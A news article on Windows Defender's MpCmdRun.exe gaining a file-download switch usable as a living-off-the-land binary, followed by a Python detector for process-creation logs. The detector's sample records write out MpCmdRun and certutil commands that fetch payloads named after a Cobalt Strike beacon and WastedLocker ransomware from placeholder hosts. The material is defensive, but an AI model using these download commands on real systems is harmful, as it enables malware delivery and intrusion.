Windows 10's built-in antivirus can be used to download viruses


A recent update to Windows 10's built-in antivirus taught the program a new trick: its command-line tool can now download files from the Internet.

Downloading malware is not the intended purpose. However, the new feature could be exploited in such a way. Fortunately, unless one is a PC masochist, the average home user need not worry.

This new capability was discovered by Mohammad Askar (via Bleeping Computer), a security penetration tester and instructor who has contributed hundreds of security articles (according to his Udemy profile).

"Now, you can use Windows Defender itself to download files from the Internet. In this example, I was able to download the Cobalt Strike beacon using the binary 'MpCmdRun.exe' which is the 'Microsoft Malware Protection Command Line,'" Askar said on Twitter.

This allows an attacker who already has command execution on the machine to leverage Defender as what is called a living-off-the-land binary (LOLBin): legitimate, already-installed and typically trusted software put to malicious use, in this case an antivirus program fetching malware.

The feature was apparently added in the July 4.18.2007.8 update to Defender's antimalware platform. Bleeping Computer tested the new download switch of the command-line tool and was able to download the same WastedLocker ransomware that recently disrupted Garmin's infrastructure and allegedly led the company to pay a multi-million dollar ransom.

This is not as careless as it may seem. For one thing, Defender scans files downloaded this way, so in theory known malware should still be caught. Second, the download has to be initiated by someone who already has a command prompt on the machine; the switch does not open any new remote path onto the box.

Nevertheless, this is something a system administrator should know about so that appropriate precautions can be taken, such as monitoring process-creation logs for MpCmdRun.exe being invoked with the download switch. It is not unheard of for a rogue employee, whether disgruntled, on the verge of termination, or for any other reason, to pull a prank.
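One precaution an administrator can take is to hunt for the download switch in process-creation events. The following is an added example, not code from the article or from Askar: it runs a small detector over constructed records in the shape of Windows Security event 4688 (process creation with command-line auditing enabled). The `-DownloadFile -url ... -path ...` syntax is the one reported for the 4.18.2007.8 platform; the user names, paths and URLs in the sample records are made up for the example.

```python
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample records modelled on Security event 4688 fields.
# These are not real logs; hosts, users and URLs are invented.
SAMPLE_4688 = [
    {"NewProcessName": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.8-0\MpCmdRun.exe",
     "CommandLine": r'"MpCmdRun.exe" -DownloadFile -url https://example.test/beacon.bin -path C:\Users\Public\beacon.bin',
     "SubjectUserName": "jsmith",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
    {"NewProcessName": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r"MpCmdRun.exe -Scan -ScanType 1",
     "SubjectUserName": "SYSTEM",
     "ParentProcessName": r"C:\Windows\System32\svchost.exe"},
    {"NewProcessName": r"C:\Program Files\Windows Defender\mpcmdrun.exe",
     "CommandLine": r'mpcmdrun.exe -downloadfile -URL http://10.0.0.5/wl.exe -PATH "C:\Users\Public\Documents\wl.exe"',
     "SubjectUserName": "jsmith",
     "ParentProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.test/x.exe x.exe",
     "SubjectUserName": "jsmith",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
]


@dataclass
class DownloadAlert:
    user: str
    parent: str
    url: Optional[str]   # None if the switch was present but no -url value followed
    dest: Optional[str]  # None if no -path value followed


def _tokens(command_line: str) -> List[str]:
    # posix=False keeps Windows backslashes intact and keeps the quotes on
    # quoted tokens; we strip those quotes ourselves.
    return [t.strip('"') for t in shlex.split(command_line, posix=False)]


def _switch_name(token: str) -> str:
    # MpCmdRun switches are case-insensitive and written with a leading '-';
    # '/' is accepted here as well so a variant spelling is not missed.
    return token.lower().lstrip("-/")


def _value_after(tokens: List[str], switch: str) -> Optional[str]:
    for i, tok in enumerate(tokens):
        if _switch_name(tok) == switch and i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def parse_mpcmdrun_download(record: dict) -> Optional[DownloadAlert]:
    """Return an alert if this 4688 record is MpCmdRun.exe using -DownloadFile."""
    image = record["NewProcessName"].rsplit("\\", 1)[-1].lower()
    if image != "mpcmdrun.exe":
        return None
    tokens = _tokens(record["CommandLine"])
    if not any(_switch_name(t) == "downloadfile" for t in tokens):
        return None
    return DownloadAlert(
        user=record.get("SubjectUserName", "?"),
        parent=record.get("ParentProcessName", "?"),
        url=_value_after(tokens, "url"),
        dest=_value_after(tokens, "path"),
    )


def scan(records: List[dict]) -> List[DownloadAlert]:
    """Run the detector over a list of 4688-style records and collect alerts."""
    alerts = []
    for rec in records:
        alert = parse_mpcmdrun_download(rec)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_4688):
        print(f"MpCmdRun download by {a.user} via {a.parent}: {a.url} -> {a.dest}")
```

The detector keys on the image name and the switch rather than on the install path, because the platform directory under `ProgramData` changes with every Defender platform update. Because the alert comes from the process-creation record, it fires even when Defender's own scan quarantines the downloaded file, so the hunt does not depend on the payload surviving on disk.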
